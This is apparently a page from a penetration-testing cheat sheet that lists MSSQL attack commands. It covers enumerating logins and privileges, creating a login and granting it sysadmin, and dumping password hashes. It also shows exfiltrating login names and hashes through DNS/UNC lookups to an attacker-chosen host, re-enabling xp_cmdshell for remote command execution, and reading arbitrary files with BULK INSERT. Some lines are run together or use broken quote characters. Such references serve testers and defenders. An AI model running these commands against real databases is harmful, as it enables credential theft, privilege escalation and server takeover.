MSSQL

Database commands

Comments

SELECT 1 -- comment
SELECT /*comment*/1

Version

SELECT @@version

Users

SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
SELECT name FROM master..syslogins
EXEC sp_addlogin '<username>', '<password>'; -- priv
EXEC sp_droplogin '<username>'; -- priv
EXEC master.dbo.sp_addsrvrolemember '<username>', 'sysadmin'; -- priv
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('sysadmin', '<usrername>');
SELECT name FROM master..syslogins WHERE sysadmin = '1'

Privileges

SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE’);
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); 
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); 
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
--who has it?--
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;
--check if current user has privilege--
SELECT is_srvrolemember(‘sysadmin’);
SELECT is_srvrolemember(‘dbcreator’);
SELECT is_srvrolemember(‘bulkadmin’);
SELECT is_srvrolemember(‘diskadmin’);
SELECT is_srvrolemember(‘processadmin’);
SELECT is_srvrolemember(‘serveradmin’);
SELECT is_srvrolemember(‘setupadmin’);
SELECT is_srvrolemember(‘securityadmin’);

Database info

SELECT DB_NAME()
SELECT name FROM master..sysdatabases;
EXEC sp_helpdb master; --location of master.mdf
EXEC sp_helpdb pubs; --location of pubs.mdf

Default tables

northwind
model
msdb
pubs -- not on sql server 2005
tempdb

List tables

SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- tables
SELECT name FROM master..sysobjects WHERE xtype = 'V'; -- views
SELECT name FROM <db name>..sysobjects WHERE xtype = 'U';

List columns

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<table>'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='<table>';

Filter table by column name

SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%<query>%';;

Access nth row

SELECT TOP 1 name FROM (SELECT TOP <nth> name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC;

String operations

substring('<str>', <start>, <end>) 
SELECT 6 & 2
SELECT char(0×41)    --'A'
SELECT ascii('A')    --41
Casting	SELECT CAST('1' as int);
SELECT CAST(1 as char)
SELECT 'A' + 'B'            --'AB'
SELECT char(65)+char(66)    --'AB'

Control flow

IF (1=1) SELECT 1 ELSE SELECT 2 
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Time delay

WAITFOR DELAY '0:0:5' -- pause for 5 seconds

DNS and HTTP

SELECT HOST_NAME();
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails "\' + @host + 'c$boot.ini"'); -- nonpriv, works on 2000declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.<URL>' from sys.sql_logins; exec('xp_fileexist "\' + @host + 'c$boot.ini"');

Passwords

SELECT name, password FROM master..sysxlogins;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins ;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;

Format: SHA1-based

Vulnerabilities

RCE

EXEC xp_cmdshell '<command>';

To reactivate the console in case the command fails:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE; 
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Arbitrary file access

CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM '<path to file>';
DROP TABLE mydata;

PreviousOracle NextMySQL

Last updated 2 years ago

hashtagDatabase commands

hashtagComments

hashtagVersion

hashtagUsers

hashtagPrivileges

hashtagDatabase info

hashtagDefault tables

hashtagList tables

hashtagList columns

hashtagFilter table by column name

hashtagAccess nth row

hashtagString operations

hashtagControl flow

hashtagTime delay

hashtagDNS and HTTP

hashtagPasswords

hashtagVulnerabilities

hashtagRCE

hashtagArbitrary file access

Database commands

Comments

Version

Users

Privileges

Database info

Default tables

List tables

List columns

Filter table by column name

Access nth row

String operations

Control flow

Time delay

DNS and HTTP

Passwords

Vulnerabilities

RCE

Arbitrary file access